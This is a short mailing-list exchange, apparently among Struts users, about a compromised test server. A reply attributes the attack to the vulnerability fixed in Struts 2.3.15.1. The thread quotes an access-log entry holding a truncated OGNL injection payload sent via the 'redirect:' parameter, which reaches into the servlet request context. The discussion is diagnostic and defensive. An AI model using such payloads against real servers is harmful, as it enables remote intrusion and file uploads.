This is the vulnerability that was addressed in Struts 2.3.15.1.
On Thu, Jan 30, 2014 at 2:36 PM, JOSE L MARTINEZ-AVIAL wrote:
> What version of Struts are you using? It seems
>
> 60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET
>
> /common/test2.action?redirect:$%7B%23a%3d%23context.get('com.
What version of Struts are you using? It seems
60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET
/common/test2.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.disp
I have seen some sample app for testing which was developed using struts2.
I saw some unknow files getting uploaded on test,
I initially thought that my tomcat was hacked or my server was hacked but
now after a close analysis it looks a struts2 webwork secuirty issue or
vulenrability or may me my
3 matches
Mail list logo
